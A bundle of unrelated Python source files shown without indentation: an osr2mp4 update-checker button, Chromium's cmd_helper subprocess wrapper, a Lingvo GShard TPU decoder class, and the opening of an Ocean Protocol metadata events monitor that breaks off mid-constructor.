from urllib import request
from pkg_resources import parse_version
import threading
class UpdateButton(Button):
def __init__(self, parent):
super(UpdateButton, self).__init__(parent)
self.main_window = parent
self.osr2mp4_current_ver = pkg_resources.get_distribution("osr2mp4").version
self.osr2mp4app_current_ver = pkg_resources.get_distribution("osr2mp4app").version
x = threading.Thread(target=self.check_updates)
x.start()
self.default_x = 20
self.default_y = 450
self.default_size = 0.75
self.text_x = 500
self.text_y = -10
self.default_fontsize = 250
self.img_idle = "res/update_btn.png"
self.img_hover = "res/update_btn_hover.png"
self.img_click = "res/update_btn_click.png"
super().setup()
self.text = QLabel(self)
self.text.setToolTip("{} | {}".format(self.osr2mp4_current_ver, self.osr2mp4app_current_ver))
logging.info("{} | {}".format(self.osr2mp4_current_ver, self.osr2mp4app_current_ver))
self.hide()
def mouseclicked(self):
# proc = subprocess.Popen([sys.executable, "updater.py"])
fupdate = open(os.path.join(self.main_window.execpath, "exit.txt"), "w")
fupdate.write("1")
fupdate.close()
sys.exit(0)
def changesize(self):
super().changesize()
scale = self.height()/self.main_window.default_height
x = scale * self.text_x
y = scale * self.text_y
fontsize = scale * self.default_fontsize
self.text.setStyleSheet("QLabel{font-size: %ipt; font-weight: bold; color: white; background-color: transparent;}QToolTip { background-color:white;color: black; }" % fontsize)
self.text.setGeometry(x, y, self.width(), self.height())
def check_updates(self):
osr2mp4_latest_ver = get_version('osr2mp4')
osr2mp4app_latest_ver = get_version('osr2mp4app')
logging.info("Latest Version of osr2mp4: {}".format(osr2mp4_latest_ver[0]))
logging.info("Latest Version of osr2mp4app: {}".format(osr2mp4app_latest_ver[0]))
logging.info("Current Version of osr2mp4: {}".format(self.osr2mp4_current_ver))
logging.info("Current Version of osr2mp4app: {}".format(self.osr2mp4app_current_ver))
if self.osr2mp4_current_ver == osr2mp4_latest_ver[0] and self.osr2mp4app_current_ver == osr2mp4app_latest_ver[0]:
print("Updated")
self.hide()
else:
print("Outdated")
self.show()
def get_version(pkg_name):
url = f'https://pypi.python.org/pypi/{pkg_name}/json'
releases = json.loads(request.urlopen(url).read())['releases']
return sorted(releases, key=parse_version, reverse=True)
|
cmd_helper.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A wrapper for subprocess to make calling shell commands easier."""
import logging
import os
import pipes
import select
import signal
import string
import StringIO
import subprocess
import sys
import time
logger = logging.getLogger(__name__)
_SafeShellChars = frozenset(string.ascii_letters + string.digits + '@%_-+=:,./')
def SingleQuote(s):
"""Return an shell-escaped version of the string using single quotes.
Reliably quote a string which may contain unsafe characters (e.g. space,
quote, or other special characters such as '$').
The returned value can be used in a shell command line as one token that gets
to be interpreted literally.
Args:
s: The string to quote.
Return:
The string quoted using single quotes.
"""
return pipes.quote(s)
def DoubleQuote(s):
"""Return an shell-escaped version of the string using double quotes.
Reliably quote a string which may contain unsafe characters (e.g. space
or quote characters), while retaining some shell features such as variable
interpolation.
The returned value can be used in a shell command line as one token that gets
to be further interpreted by the shell.
The set of characters that retain their special meaning may depend on the
shell implementation. This set usually includes: '$', '`', '\', '!', '*',
and '@'.
Args:
s: The string to quote.
Return:
The string quoted using double quotes.
"""
if not s:
return '""'
elif all(c in _SafeShellChars for c in s):
return s
else:
return '"' + s.replace('"', '\\"') + '"'
def ShrinkToSnippet(cmd_parts, var_name, var_value):
"""Constructs a shell snippet for a command using a variable to shrink it.
Takes into account all quoting that needs to happen.
Args:
cmd_parts: A list of command arguments.
var_name: The variable that holds var_value.
var_value: The string to replace in cmd_parts with $var_name
Returns:
A shell snippet that does not include setting the variable.
"""
def shrink(value):
parts = (x and SingleQuote(x) for x in value.split(var_value))
with_substitutions = ('"$%s"' % var_name).join(parts)
return with_substitutions or "''"
return ' '.join(shrink(part) for part in cmd_parts)
def Popen(args, stdout=None, stderr=None, shell=None, cwd=None, env=None):
# preexec_fn isn't supported on windows.
if sys.platform == 'win32':
close_fds = (stdout is None and stderr is None)
preexec_fn = None
else:
close_fds = True
preexec_fn = lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL)
return subprocess.Popen(
args=args, cwd=cwd, stdout=stdout, stderr=stderr,
shell=shell, close_fds=close_fds, env=env, preexec_fn=preexec_fn)
def Call(args, stdout=None, stderr=None, shell=None, cwd=None, env=None):
pipe = Popen(args, stdout=stdout, stderr=stderr, shell=shell, cwd=cwd,
env=env)
pipe.communicate()
return pipe.wait()
def RunCmd(args, cwd=None):
"""Opens a subprocess to execute a program and returns its return value.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
Returns:
Return code from the command execution.
"""
logger.info(str(args) + ' ' + (cwd or ''))
return Call(args, cwd=cwd)
def GetCmdOutput(args, cwd=None, shell=False, env=None):
"""Open a subprocess to execute a program and returns its output.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
Captures and returns the command's stdout.
Prints the command's stderr to logger (which defaults to stdout).
"""
(_, output) = GetCmdStatusAndOutput(args, cwd, shell, env)
return output
def _ValidateAndLogCommand(args, cwd, shell):
if isinstance(args, basestring):
if not shell:
raise Exception('string args must be run with shell=True')
else:
if shell:
raise Exception('array args must be run with shell=False')
args = ' '.join(SingleQuote(str(c)) for c in args)
if cwd is None:
cwd = ''
else:
cwd = ':' + cwd
logger.info('[host]%s> %s', cwd, args)
return args
def GetCmdStatusAndOutput(args, cwd=None, shell=False, env=None):
"""Executes a subprocess and returns its exit code and output.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 2-tuple (exit code, stdout).
"""
status, stdout, stderr = GetCmdStatusOutputAndError(
args, cwd=cwd, shell=shell, env=env)
if stderr:
logger.critical('STDERR: %s', stderr)
logger.debug('STDOUT: %s%s', stdout[:4096].rstrip(),
'<truncated>' if len(stdout) > 4096 else '')
return (status, stdout)
def StartCmd(args, cwd=None, shell=False, env=None):
"""Starts a subprocess and returns a handle to the process.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
A process handle from subprocess.Popen.
"""
_ValidateAndLogCommand(args, cwd, shell)
return Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=shell, cwd=cwd, env=env)
def GetCmdStatusOutputAndError(args, cwd=None, shell=False, env=None):
"""Executes a subprocess and returns its exit code, output, and errors.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 3-tuple (exit code, stdout, stderr).
"""
_ValidateAndLogCommand(args, cwd, shell)
pipe = Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=shell, cwd=cwd, env=env)
stdout, stderr = pipe.communicate()
return (pipe.returncode, stdout, stderr)
class TimeoutError(Exception):
"""Module-specific timeout exception."""
def __init__(self, output=None):
super(TimeoutError, self).__init__()
self._output = output
@property
def output(self):
return self._output
def _IterProcessStdoutFcntl(
process, iter_timeout=None, timeout=None, buffer_size=4096,
poll_interval=1):
"""An fcntl-based implementation of _IterProcessStdout."""
# pylint: disable=too-many-nested-blocks
import fcntl
try:
# Enable non-blocking reads from the child's stdout.
child_fd = process.stdout.fileno()
fl = fcntl.fcntl(child_fd, fcntl.F_GETFL)
fcntl.fcntl(child_fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
end_time = (time.time() + timeout) if timeout else None
iter_end_time = (time.time() + iter_timeout) if iter_timeout else None
while True:
if end_time and time.time() > end_time:
raise TimeoutError()
if iter_end_time and time.time() > iter_end_time:
yield None
iter_end_time = time.time() + iter_timeout
if iter_end_time:
iter_aware_poll_interval = min(
poll_interval,
max(0, iter_end_time - time.time()))
else:
iter_aware_poll_interval = poll_interval
read_fds, _, _ = select.select(
[child_fd], [], [], iter_aware_poll_interval)
if child_fd in read_fds:
data = os.read(child_fd, buffer_size)
if not data:
break
yield data
if process.poll() is not None:
# If process is closed, keep checking for output data (because of timing
# issues).
while True:
read_fds, _, _ = select.select(
[child_fd], [], [], iter_aware_poll_interval)
if child_fd in read_fds:
data = os.read(child_fd, buffer_size)
if data:
yield data
continue
break
break
finally:
try:
if process.returncode is None:
# Make sure the process doesn't stick around if we fail with an
# exception.
process.kill()
except OSError:
pass
process.wait()
def _IterProcessStdoutQueue(
process, iter_timeout=None, timeout=None, buffer_size=4096,
poll_interval=1):
"""A Queue.Queue-based implementation of _IterProcessStdout.
TODO(jbudorick): Evaluate whether this is a suitable replacement for
_IterProcessStdoutFcntl on all platforms.
"""
# pylint: disable=unused-argument
import Queue
import threading
stdout_queue = Queue.Queue()
def read_process_stdout():
# TODO(jbudorick): Pick an appropriate read size here.
while True:
try:
output_chunk = os.read(process.stdout.fileno(), buffer_size)
except IOError:
break
stdout_queue.put(output_chunk, True)
if not output_chunk and process.poll() is not None:
break
reader_thread = threading.Thread(target=read_process_stdout)
reader_thread.start()
end_time = (time.time() + timeout) if timeout else None
try:
while True:
if end_time and time.time() > end_time:
raise TimeoutError()
try:
s = stdout_queue.get(True, iter_timeout)
if not s:
break
yield s
except Queue.Empty:
yield None
finally:
try:
if process.returncode is None:
# Make sure the process doesn't stick around if we fail with an
# exception.
process.kill()
except OSError:
pass
process.wait()
reader_thread.join()
_IterProcessStdout = (
_IterProcessStdoutQueue
if sys.platform == 'win32'
else _IterProcessStdoutFcntl)
"""Iterate over a process's stdout.
This is intentionally not public.
Args:
process: The process in question.
iter_timeout: An optional length of time, in seconds, to wait in
between each iteration. If no output is received in the given
time, this generator will yield None.
timeout: An optional length of time, in seconds, during which
the process must finish. If it fails to do so, a TimeoutError
will be raised.
buffer_size: The maximum number of bytes to read (and thus yield) at once.
poll_interval: The length of time to wait in calls to `select.select`.
If iter_timeout is set, the remaining length of time in the iteration
may take precedence.
Raises:
TimeoutError: if timeout is set and the process does not complete.
Yields:
basestrings of data or None.
"""
def GetCmdStatusAndOutputWithTimeout(args, timeout, cwd=None, shell=False,
logfile=None, env=None):
"""Executes a subprocess with a timeout.
Args:
args: List of arguments to the program, the program to execute is the first
element.
timeout: the timeout in seconds or None to wait forever.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
logfile: Optional file-like object that will receive output from the
command as it is running.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 2-tuple (exit code, output).
Raises:
TimeoutError on timeout.
"""
_ValidateAndLogCommand(args, cwd, shell)
output = StringIO.StringIO()
process = Popen(args, cwd=cwd, shell=shell, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
try:
for data in _IterProcessStdout(process, timeout=timeout):
if logfile:
logfile.write(data)
output.write(data)
except TimeoutError:
raise TimeoutError(output.getvalue())
str_output = output.getvalue()
logger.debug('STDOUT+STDERR: %s%s', str_output[:4096].rstrip(),
'<truncated>' if len(str_output) > 4096 else '')
return process.returncode, str_output
def IterCmdOutputLines(args, iter_timeout=None, timeout=None, cwd=None,
shell=False, env=None, check_status=True):
"""Executes a subprocess and continuously yields lines from its output.
Args:
args: List of arguments to the program, the program to execute is the first
element.
iter_timeout: Timeout for each iteration, in seconds.
timeout: Timeout for the entire command, in seconds.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
check_status: A boolean indicating whether to check the exit status of the
process after all output has been read.
Yields:
The output of the subprocess, line by line.
Raises:
CalledProcessError if check_status is True and the process exited with a
non-zero exit status.
"""
cmd = _ValidateAndLogCommand(args, cwd, shell)
process = Popen(args, cwd=cwd, shell=shell, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return _IterCmdOutputLines(
process, cmd, iter_timeout=iter_timeout, timeout=timeout,
check_status=check_status)
def _IterCmdOutputLines(process, cmd, iter_timeout=None, timeout=None,
check_status=True):
buffer_output = ''
iter_end = None
cur_iter_timeout = None
if iter_timeout:
iter_end = time.time() + iter_timeout
cur_iter_timeout = iter_timeout
for data in _IterProcessStdout(process, iter_timeout=cur_iter_timeout,
timeout=timeout):
if iter_timeout:
# Check whether the current iteration has timed out.
cur_iter_timeout = iter_end - time.time()
if data is None or cur_iter_timeout < 0:
yield None
iter_end = time.time() + iter_timeout
continue
else:
assert data is not None, (
'Iteration received no data despite no iter_timeout being set. '
'cmd: %s' % cmd)
# Construct lines to yield from raw data.
buffer_output += data
has_incomplete_line = buffer_output[-1] not in '\r\n'
lines = buffer_output.splitlines()
buffer_output = lines.pop() if has_incomplete_line else ''
for line in lines:
yield line
if iter_timeout:
iter_end = time.time() + iter_timeout
if buffer_output:
yield buffer_output
if check_status and process.returncode:
raise subprocess.CalledProcessError(process.returncode, cmd)
|
gshard_decode.py
|
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""GShard decoder class."""
import threading
import time
from lingvo import compat as tf
from lingvo.core import cluster as lingvo_cluster
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import py_utils
from lingvo.core import tpu_summary
import numpy as np
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.protobuf.tpu import topology_pb2
from tensorflow.python.tpu import device_assignment as tpu_device_assignment
from tensorflow.python.tpu import tpu as tpu_lib
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint: enable=g-direct-tensorflow-import
def preload_zero(n=None, batch_size=None, max_len=None, key_size=2):
"""Returns the same structure as preload_unpacked but with zeros."""
batch = (
# key: (fileno + lineno) in batch mode
# (rpc id + timestamp) in rpc mode
np.zeros([n, batch_size, key_size], np.int32),
# tgt_id
np.zeros([n, batch_size, max_len], np.int32),
# tgt_segment_id
np.zeros([n, batch_size, max_len], np.float32),
# tgt_segment_pos
np.zeros([n, batch_size, max_len], np.int32),
# tgt_labels
np.zeros([n, batch_size, max_len], np.int32),
# tgt_sample_temperature
np.zeros([n, batch_size], np.float32),
)
return batch
def get_zero_batch(batch_size=None,
max_len=None,
key_size=2,
return_tgt_mask=False):
"""Returns zero batch.
Args:
batch_size: batch size.
max_len: max length.
key_size: key size.
return_tgt_mask: if to return tgt_mask.
Returns: a tuple of tensors
key: int32 tensor [batch_size, key_size]
tgt_id: int32 tensor [batch_size, max_len]
tgt_segment_id: float32 tensor [batch_size, max_len]
tgt_segment_pos: int32 tensor [batch_size, max_len]
tgt_labels: int32 tensor [batch_size, max_len]
tgt_sample_temperature: float32 tensor [batch_size]
tgt_mask: optional float32 tensor [batch_size, max_len, max_len]
"""
batch = preload_zero(
n=1, batch_size=batch_size, max_len=max_len, key_size=key_size)
batch = py_utils.Transform(lambda x: np.squeeze(x, 0), batch)
if return_tgt_mask:
tgt_mask = np.zeros([batch_size, max_len, max_len], np.float32)
batch = (*batch, tgt_mask)
return batch
# mimic training_loop.repeat(), but make it repeat forever.
def infinite_repeat(body_fn, infeed_queue):
"""Builds infinite loop.
Args:
body_fn: a Python function that builds the loop body.
infeed_queue: if not None, the infeed queue from which to append a tuple of
arguments as inputs to condition.
Returns:
The final values of the loop-carried tensors.
"""
def to_list(x):
if isinstance(x, (list, tuple)):
return list(x)
else:
return [x]
def body_fn_wrapper(i, *args):
return [i + 1] + to_list(body_fn(*args))
outputs = training_loop.while_loop(
lambda i, *args: tf.constant(True), # infinite loop
body_fn_wrapper,
inputs=[0],
infeed_queue=infeed_queue)
outputs = to_list(outputs)
if len(outputs) == 1:
# Returns the Op rather than an empty list.
return outputs[0].op
else:
return outputs[1:]
def daemon(closure):
"""Runs the closure in a background thread."""
thread = threading.Thread(target=closure)
thread.daemon = True
thread.start()
return thread
class GShardDecode:
"""Base decoder class.
Implements the main computation loop.
Attrs:
tpu: name or addresss of the tpu node.
worker_job_name: job name of tpu.
prefix_max_len: Length of prefix.
cluster_params: cluster params.
cluster: cluster object.
graph: a tf.Graph() in which ops are build.
task: the task object.
compile_op: tpu program compile op.
init_vars_op: op to init vars randomly.
infeed_op: the tf op to infeed data.
infeed_args: a list of placeholder nodes.
outfeed_op: the tf op to poll outfeed.
outfeed: a list of outfeed tensors. used as structure reference.
decode_loop: the op to start decode loop.
saver: tf.train.Saver object.
num_batches: num of decode steps to run. If None, run infinitely.
spm: SentencePieceModel object
"""
def __init__(self, tpu=None, worker_job_name=None, prefix_max_len=128):
self._tpu = tpu
self._worker_job = worker_job_name
self._prefix_max_len = prefix_max_len
self._c = threading.Condition() # lock
# set in reset_session
self._sess = None
# set in configure_cluster_params
self.cluster_params = None
# set in init_graph
self.cluster = None
self.graph = tf.Graph()
self.task = None
self.compile_op = None
self.init_vars_op = None
self.infeed_op = None
self.infeed_args = None
self.outfeed_op = None
self.outfeed = None
self.decode_loop = None
self.saver = None
self.num_batches = None
self._heartbeat = False
self._saver_reshape = True
# set in load_spm
self.spm = None
def load_spm(self, spm):
self.spm = gshard_utils.LoadSpm(spm)
def reset_tpu_cluster(self):
tf.logging.info('Connecting to tpu %s', self._tpu)
with tf.container('') as container:
# Kills all sessions on this cluster.
tf.Session.reset(
target=self._tpu,
containers=[container],
config=self._no_opt_sess_cfg())
def get_session(self):
self._c.acquire()
while not self._sess:
tf.logging.info('Waiting for session to be setup ...')
self._c.wait()
sess = self._sess
self._c.release()
return sess
def _no_opt_sess_cfg(self):
# Disable constant folding for convenience.
return tf.config_pb2.ConfigProto(
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
def reset_session(self, target):
"""Resets session on target worker with current graph."""
self._c.acquire()
if self._sess is not None:
try:
self._sess.close()
except tf.errors.AbortedError as e:
# It's ok if the session is already aborted.
tf.logging.error('Exception %s', str(e))
pass
tf.logging.info('Creating new session ...')
self._sess = tf.Session(
target=target, graph=self.graph, config=self._no_opt_sess_cfg())
tf.logging.info('Done creating new session.')
self._c.notify()
self._c.release()
return self._sess
def run_init_sequence(self):
"""Runs init sequences before decoding."""
assert self.init_vars_op is not None
assert self.compile_op is not None
sess = self.reset_session(self._tpu)
if self._heartbeat:
self._start_heartbeat()
if self.ckpt:
def run_restore():
tf.logging.info('Restoring vars from ckpt: start')
try:
self.saver.restore(sess, self.ckpt)
except Exception as e:
tf.logging.fatal('Restoring vars exception: %r %s', e, e)
raise
tf.logging.info('Restoring vars from ckpt: done')
init_thread = daemon(run_restore)
else:
def run_init():
tf.logging.info('Init vars randomly: start')
try:
sess.run(self.init_vars_op)
except Exception as e:
tf.logging.fatal('Init vars exception: %r %s', e, e)
raise
tf.logging.info('Init vars randomly: done')
init_thread = daemon(run_init)
if hasattr(self.task, 'input'):
tf.logging.info('Init data')
self.task.input.Initialize(sess)
tf.logging.info('Init data done')
tf.logging.info('Compile: start')
run_options = tf.RunOptions(timeout_in_ms=86400 * 1000)
sess.run(self.compile_op, options=run_options)
tf.logging.info('Compile: done')
init_thread.join()
def _configure_cluster_params(self, tpu_cores=None, cpu_hosts=None):
"""Initialize cluster params."""
tf.logging.info(cpu_hosts)
cluster_factory.SetCluster(lingvo_cluster._Cluster) # pylint: disable=protected-access
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.do_eval = True # turn off dropout
cluster_params.worker.name = self._worker_job
cluster_params.worker.tpus_per_replica = tpu_cores
cluster_params.worker.devices_per_split = tpu_cores
cluster_params.worker.num_tpu_hosts = cpu_hosts
cluster_params.ps.name = self._worker_job
cluster_params.ps.replicas = cpu_hosts
return cluster_params
def _start_heartbeat(self):
"""Start the heartbeat."""
def run_heartbeat_loop():
count = 0
# Set a timeout of 30 seconds for each heartbeat.
run_options = tf.RunOptions(timeout_in_ms=30 * 1000)
while True:
try:
if count % 100 == 0:
tf.logging.info('heartbeat: request_%d ...', count)
t_begin = time.time()
sess = self.get_session()
ret = sess.run(self.heartbeat, options=run_options)
if self.streamz_heartbeat_latency is not None:
self.streamz_heartbeat_latency.Record((time.time() - t_begin) * 1e3)
if count % 100 == 0:
tf.logging.info('heartbeat: done request_%d ... %s', count, ret)
except Exception as e:
tf.logging.fatal('Exception in heartbeat loop thread: %r %s', e, e)
raise
count += 1
# Once every 10 seconds.
time.sleep(10)
daemon(run_heartbeat_loop)
def _config_infeed(self,
num_partitions,
device_assignment,
batch_size,
key_size=2,
return_tgt_mask=False,
use_partitioned_infeed_queue=False):
"""Config the infeed ops and args."""
zero_batch = get_zero_batch(
batch_size=batch_size,
max_len=self._prefix_max_len,
key_size=key_size,
return_tgt_mask=return_tgt_mask)
host_device = device_assignment.host_device(replica=0, job=self._tpu)
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
input_partition_dims = [
[num_partitions] + [1] * (len(x.shape) - 1) for x in zero_batch
]
if use_partitioned_infeed_queue:
infeed = tpu_feed._PartitionedInfeedQueue( # pylint: disable=protected-access
number_of_tuple_elements=len(zero_batch),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=device_assignment)
else:
infeed = tpu_feed.InfeedQueue(number_of_tuple_elements=len(zero_batch))
self.infeed_args = []
for x in zero_batch:
p = tf.placeholder(tf.as_dtype(x.dtype), shape=x.shape)
self.infeed_args += [p]
if use_partitioned_infeed_queue:
self.infeed_op = infeed.generate_enqueue_ops([self.infeed_args])
else:
self.infeed_op = infeed.split_inputs_and_generate_enqueue_ops(
self.infeed_args, device_assignment=device_assignment)
return infeed
def _init_tpu(self, num_partitions, device_order_mode):
"""Initialize tpu device assignment."""
tf.logging.info('Initializing TPU to get device assignment: start')
graph = tf.Graph()
with graph.as_default():
init_tpu_op = tf.tpu.initialize_system()
try:
sess = tf.Session(target=self._tpu, graph=graph)
topology = sess.run(init_tpu_op)
except Exception as e:
tf.logging.fatal('TPU initialization failed: %s', e)
raise
topology_proto = topology_pb2.TopologyProto()
topology_proto.ParseFromString(topology)
tf.logging.info('topology.num_tasks: %r', topology_proto.num_tasks)
tf.logging.info('topology.num_tpu_devices_per_task: %r',
topology_proto.num_tpu_devices_per_task)
tf.logging.info('topology.mesh_shape: %r', topology_proto.mesh_shape)
self.cluster_params = self._configure_cluster_params(
tpu_cores=(topology_proto.num_tpu_devices_per_task *
topology_proto.num_tasks),
cpu_hosts=topology_proto.num_tasks)
# We assume the topology and device assignment does not change
# for a single address space.
device_assignment = tpu_device_assignment.device_assignment(
topology,
computation_shape=py_utils.ComputationShape(num_partitions, topology),
num_replicas=1,
device_order_mode=device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('Initializing TPU to get device assignment: done')
def init_graph(self, model_params):
"""Builds moe decode graph.
Args:
model_params: the hyperparams of the specified model.
"""
assert self.graph
self.model_params = model_params
batch_size = model_params.task.batch_size
if (hasattr(model_params.task.builder, 'device_mesh_shape') and
model_params.task.builder.device_mesh_shape):
num_partitions = np.prod(model_params.task.builder.device_mesh_shape)
else:
num_partitions = model_params.task.builder.num_devices
device_order_mode = (
model_params.task.train.tpu_device_order_mode or
tpu_device_assignment.DeviceOrderMode.AUTO)
self._init_tpu(num_partitions, device_order_mode)
assert self.cluster_params # configured by init_tpu
self.cluster = self.cluster_params.Instantiate()
with self.graph.as_default(), self.cluster, tf.device(
self.cluster.GetPlacer()):
_ = py_utils.GetOrCreateGlobalStepVar()
self.heartbeat = tf.constant(np.pi)
device_assignment = py_utils.GetTpuDeviceAssignment()
tf.logging.info('Instantiating model')
model = model_params.Instantiate()
xformer = model.GetTask()
self.task = xformer
self.init_vars_op = tf.global_variables_initializer()
self.saver = tf.train.Saver(sharded=True, reshape=self._saver_reshape)
infeed = self._config_infeed(
num_partitions=num_partitions,
device_assignment=device_assignment,
batch_size=batch_size)
self.outfeed = []
def decode_fn(*infeed_batch): # pylint: disable=missing-docstring
# Length 6 is passed when there is no tgt_mask (e.g. decoding) and
# length 7 is passed when there is a tgt_mask (e.g. fprop).
self.outfeed = self._config_outfeed(xformer, infeed_batch)
with tf.device(tf.tpu.core(0)):
outfeed_op = tpu_ops.outfeed_enqueue_tuple(
tf.nest.flatten(self.outfeed))
return [outfeed_op]
@tpu_function.on_device_training_loop
def decode_loop_fn():
if not self.num_batches:
infinite_repeat(decode_fn, infeed)
else:
training_loop.repeat(self.num_batches, decode_fn, infeed_queue=infeed)
self.compile_op, self.decode_loop = tpu_lib.split_compile_and_shard(
decode_loop_fn, num_shards=1, device_assignment=device_assignment)
assert self.outfeed
with tf.device(device_assignment.tpu_device(0, 0)):
self.outfeed_op = tpu_ops.outfeed_dequeue_tuple(
dtypes=[x.dtype for x in tf.nest.flatten(self.outfeed)],
shapes=[x.shape for x in tf.nest.flatten(self.outfeed)])
def _config_outfeed(self, xformer, infeed_batch):
"""Setup the outfeed ops."""
fprop_dtype = py_utils.FPropDtype(self.model_params.task)
assert len(infeed_batch) == 6 or len(infeed_batch) == 7, len(infeed_batch)
if len(infeed_batch) == 7:
(key, tgt_ids, tgt_segment_id, tgt_segment_pos, tgt_labels, _,
_) = infeed_batch
elif len(infeed_batch) == 6:
(key, tgt_ids, tgt_segment_id, tgt_segment_pos, tgt_labels,
_) = infeed_batch
tgt_segment_id = tf.cast(tgt_segment_id, fprop_dtype)
input_batch = py_utils.NestedMap()
input_batch.src = py_utils.NestedMap()
input_batch.src.ids = (0 * tgt_ids) # unused
input_batch.src.segment_ids = (0 * tgt_segment_id) # unused
input_batch.src.segment_pos = (0 * tgt_segment_pos) # unused
input_batch.tgt = py_utils.NestedMap()
input_batch.tgt.ids = tgt_ids
input_batch.tgt.segment_ids = tgt_segment_id
input_batch.tgt.segment_pos = tgt_segment_pos
input_batch.tgt.labels = tgt_labels # only used when --fprop=true
with tpu_summary.context(rewrite_while_loop=True):
dec_ret = xformer.DecodeIds(xformer.theta, input_batch)
dec_metrics = tpu_summary.merge_all()
key = infeed_batch[0]
return [
key, tgt_ids, tgt_segment_id, dec_ret.topk_ids, dec_ret.topk_lens,
dec_ret.topk_scores, dec_metrics
]
|
events_monitor.py
|
# Copyright 2020 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
import logging
import os
import time
import lzma as Lzma
import json
from json import JSONDecodeError
from threading import Thread
from datetime import datetime
import elasticsearch
import requests
from eth_utils import remove_0x_prefix, add_0x_prefix
from ocean_lib.config_provider import ConfigProvider
from eth_account import Account
import eth_keys
import ecies
from oceandb_driver_interface import OceanDb
from aquarius.app.util import (
get_metadata_from_services,
list_errors,
validate_data,
init_new_ddo,
format_timestamp,
DATETIME_FORMAT,
)
from aquarius.app.auth_util import compare_eth_addresses, sanitize_addresses
from plecos.plecos import is_valid_dict_remote, list_errors_dict_remote
from aquarius.events.constants import EVENT_METADATA_CREATED, EVENT_METADATA_UPDATED
from aquarius.events.metadata_updater import MetadataUpdater
from aquarius.events.util import get_metadata_contract, get_datatoken_info
logger = logging.getLogger(__name__)
debug_log = logger.debug
class EventsMonitor:
"""Detect on-chain published Metadata and cache it in the database for
fast retrieval and searchability.
The published metadata is extracted from the `MetadataCreated`
event log from the `Metadata` smartcontract. Metadata updates are also detected using
the `MetadataUpdated` event.
The Metadata json object is expected to be
in an `lzma` compressed form. If desired the metadata can also be encrypted for specific
use cases. When using encrypted Metadata, the EventsMonitor requires the private key of
the ethereum account that is used for encryption. This can be specified in `EVENTS_ECIES_PRIVATE_KEY`
envvar.
The events monitor pauses for 25 seconds between updates.
The cached Metadata can be restricted to only those published by specific ethereum accounts.
To do this set the `ALLOWED_PUBLISHERS` envvar to the list of ethereum addresses of known publishers.
"""
_instance = None
def __init__(self, web3, config_file, metadata_contract=None):
self._oceandb = OceanDb(config_file).plugin
self._other_db_index = f"{self._oceandb.driver.db_index}_plus"
self._oceandb.driver.es.indices.create(index=self._other_db_index, ignore=400)
self._web3 = web3
self._pool_monitor = None
if bool(int(os.getenv("PROCESS_POOL_EVENTS", 1)) == 1):
self._pool_monitor = MetadataUpdater(
self._oceandb,
self._other_db_index,
self._web3,
ConfigProvider.get_config(),
)
if not metadata_contract:
metadata_contract = get_metadata_contract(self._web3)
self._contract = metadata_contract
self._contract_address = self._contract.address
self._ecies_private_key = os.getenv("EVENTS_ECIES_PRIVATE_KEY", "")
self._ecies_account = None
if self._ecies_private_key:
self._ecies_account = Account.privateKeyToAccount(self._ecies_private_key)
metadata_block = int(os.getenv("METADATA_CONTRACT_BLOCK", 0))
try:
self.get_last_processed_block()
except Exception:
self.store_last_processed_block(metadata_block)
